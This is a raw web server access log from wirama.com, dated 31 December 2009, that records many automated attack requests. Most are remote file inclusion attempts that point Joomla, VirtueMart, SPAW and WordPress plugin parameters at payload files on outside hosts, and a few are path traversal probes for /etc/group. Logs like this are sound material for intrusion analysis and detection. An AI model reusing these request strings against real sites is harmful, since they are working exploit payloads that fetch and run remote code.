189.72.61.206 - - [31/Dec/2009:18:22:19 -0800] "GET /logs/access_090801.log//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
208.187.91.50 - - [31/Dec/2009:18:22:31 -0800] "GET /logs/access_090601.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:23:48 -0800] "GET /logs/access_090330.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
212.175.5.130 - - [31/Dec/2009:18:24:19 -0800] "GET /logs/access_091031.log//bbs/skin/zae_plan/view_foot.php/write.php?dir=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
66.98.216.61 - - [31/Dec/2009:18:26:09 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "wirama.com"
66.98.216.61 - - [31/Dec/2009:18:26:09 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:26:28 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.72.61.206 - - [31/Dec/2009:18:26:28 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.72.61.206 - - [31/Dec/2009:18:26:28 -0800] "GET /logs/access_090801.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.72.61.206 - - [31/Dec/2009:18:28:19 -0800] "GET /administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:28:19 -0800] "GET /logs//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:28:19 -0800] "GET /logs/access_090401.log//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:28:20 -0800] "GET /logs/access_090801.log//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [31/Dec/2009:18:28:43 -0800] "GET /logs/access_091031.log//?_SERVER[DOCUMENT_ROOT]=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [31/Dec/2009:18:28:43 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 200 3803 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [31/Dec/2009:18:28:43 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:29:32 -0800] "GET /logs/access_090801.log//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
69.175.29.2 - - [31/Dec/2009:18:30:16 -0800] "GET /logs/access_090801.log%20%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.t-w.co.uk/joomla/templates/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
69.175.29.2 - - [31/Dec/2009:18:30:16 -0800] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.t-w.co.uk/joomla/templates/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
69.175.29.2 - - [31/Dec/2009:18:30:16 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.t-w.co.uk/joomla/templates/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.72.61.206 - - [31/Dec/2009:18:31:50 -0800] "GET /logs/access_090401.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:31:50 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:31:50 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:31:55 -0800] "GET /logs/access_090801.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:32:20 -0800] "GET /logs/access_090330.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.72.61.206 - - [31/Dec/2009:18:33:31 -0800] "GET /logs/access_090330.log//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.72.61.206 - - [31/Dec/2009:18:36:07 -0800] "GET /logs/access_090330.log//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
201.45.123.132 - - [31/Dec/2009:18:36:22 -0800] "GET /logs/access_090330.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.metropolitanediciones.com/efectos/pw.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
201.45.123.132 - - [31/Dec/2009:18:36:22 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.metropolitanediciones.com/efectos/pw.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
201.45.123.132 - - [31/Dec/2009:18:36:23 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.metropolitanediciones.com/efectos/pw.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
142.150.1.9 - - [31/Dec/2009:18:36:38 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
142.150.1.9 - - [31/Dec/2009:18:36:38 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
69.175.29.2 - - [31/Dec/2009:18:37:16 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.t-w.co.uk/joomla/templates/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
69.175.29.2 - - [31/Dec/2009:18:37:16 -0800] "GET /logs/access_091101.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.t-w.co.uk/joomla/templates/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
69.175.29.2 - - [31/Dec/2009:18:37:16 -0800] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.t-w.co.uk/joomla/templates/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:37:53 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:37:53 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:37:54 -0800] "GET /logs/access_090401.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:38:14 -0800] "GET /logs/access_090329.log//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.72.61.206 - - [31/Dec/2009:18:38:48 -0800] "GET /logs/access_090329.log//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.72.61.206 - - [31/Dec/2009:18:39:27 -0800] "GET /logs/access_090801.log//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.72.61.206 - - [31/Dec/2009:18:39:39 -0800] "GET /logs/access_090330.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.72.61.206 - - [31/Dec/2009:18:41:41 -0800] "GET /logs/access_090329.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.72.61.206 - - [31/Dec/2009:18:43:28 -0800] "GET /logs/access_090801.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.72.61.206 - - [31/Dec/2009:18:46:20 -0800] "GET /database.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:46:20 -0800] "GET /logs//database.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:46:21 -0800] "GET /logs/access_091201.log//database.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:46:25 -0800] "GET /logs/access_090701.log//database.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:47:28 -0800] "GET /logs/access_090330.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
201.45.123.132 - - [31/Dec/2009:18:48:12 -0800] "GET /logs/access_090801.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.metropolitanediciones.com/efectos/pw.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
189.72.61.206 - - [31/Dec/2009:18:48:38 -0800] "GET /database.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:48:38 -0800] "GET /logs//database.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:48:38 -0800] "GET /logs/access_091201.log//database.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:48:44 -0800] "GET /logs/access_090701.log//database.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:49:08 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:49:08 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:49:08 -0800] "GET /logs/access_090701.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:49:08 -0800] "GET /logs/access_091201.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:49:41 -0800] "GET /logs/access_090329.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
65.55.207.23 - - [31/Dec/2009:18:50:06 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:50:38 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:50:38 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:50:38 -0800] "GET /logs/access_091201.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:50:39 -0800] "GET /logs/access_090701.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [31/Dec/2009:18:50:48 -0800] "GET /logs/access_090801.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
65.55.207.23 - - [31/Dec/2009:18:53:11 -0800] "GET /_private/ HTTP/1.1" 200 675 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
66.249.65.122 - - [31/Dec/2009:19:07:30 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.wirama.com"
67.108.239.1 - - [31/Dec/2009:19:12:42 -0800] "GET /logs/access_090331.log/errors.php?error=http://www.fce.unam.edu.ar/investigaciones/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [31/Dec/2009:19:12:42 -0800] "GET /errors.php?error=http://www.fce.unam.edu.ar/investigaciones/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [31/Dec/2009:19:12:42 -0800] "GET /logs/errors.php?error=http://www.fce.unam.edu.ar/investigaciones/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
69.175.29.2 - - [31/Dec/2009:19:13:42 -0800] "GET /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.t-w.co.uk/joomla/templates/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
69.175.29.2 - - [31/Dec/2009:19:13:42 -0800] "GET /logs/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.t-w.co.uk/joomla/templates/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
69.175.29.2 - - [31/Dec/2009:19:13:42 -0800] "GET /logs/access_090731.log/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.t-w.co.uk/joomla/templates/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.207.53 - - [31/Dec/2009:19:15:41 -0800] "GET /tmp/?S=A HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
202.30.48.8 - - [31/Dec/2009:19:34:50 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.30.48.8 - - [31/Dec/2009:19:34:50 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.30.48.8 - - [31/Dec/2009:19:34:50 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.30.48.8 - - [31/Dec/2009:19:34:50 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.30.48.8 - - [31/Dec/2009:19:34:50 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.30.48.8 - - [31/Dec/2009:19:34:50 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.30.48.8 - - [31/Dec/2009:19:35:53 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.30.48.8 - - [31/Dec/2009:19:35:53 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.30.48.8 - - [31/Dec/2009:19:35:53 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.30.48.8 - - [31/Dec/2009:19:35:53 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.30.48.8 - - [31/Dec/2009:19:35:53 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.30.48.8 - - [31/Dec/2009:19:35:53 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [31/Dec/2009:19:36:12 -0800] "GET /logs/access_090601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.90.50.4 - - [31/Dec/2009:19:38:00 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.90.50.4 - - [31/Dec/2009:19:38:00 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.90.50.4 - - [31/Dec/2009:19:38:00 -0800] "GET /logs/access_090501.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.90.50.4 - - [31/Dec/2009:19:38:11 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.90.50.4 - - [31/Dec/2009:19:38:12 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.90.50.4 - - [31/Dec/2009:19:38:12 -0800] "GET /logs/access_090701.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.30.48.8 - - [31/Dec/2009:19:38:12 -0800] "GET /logs/access_090601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.30.48.8 - - [31/Dec/2009:19:38:12 -0800] "GET /logs/access_090601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.216.213.119 - - [31/Dec/2009:19:38:45 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.216.213.119 - - [31/Dec/2009:19:38:45 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.216.213.119 - - [31/Dec/2009:19:38:45 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
142.150.1.9 - - [31/Dec/2009:19:39:10 -0800] "GET /logs/access_090601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [31/Dec/2009:19:40:01 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [31/Dec/2009:19:40:01 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [31/Dec/2009:19:40:08 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.30.48.8 - - [31/Dec/2009:19:41:45 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.30.48.8 - - [31/Dec/2009:19:41:45 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.30.48.8 - - [31/Dec/2009:19:41:45 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.30.48.8 - - [31/Dec/2009:19:41:46 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.30.48.8 - - [31/Dec/2009:19:41:46 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
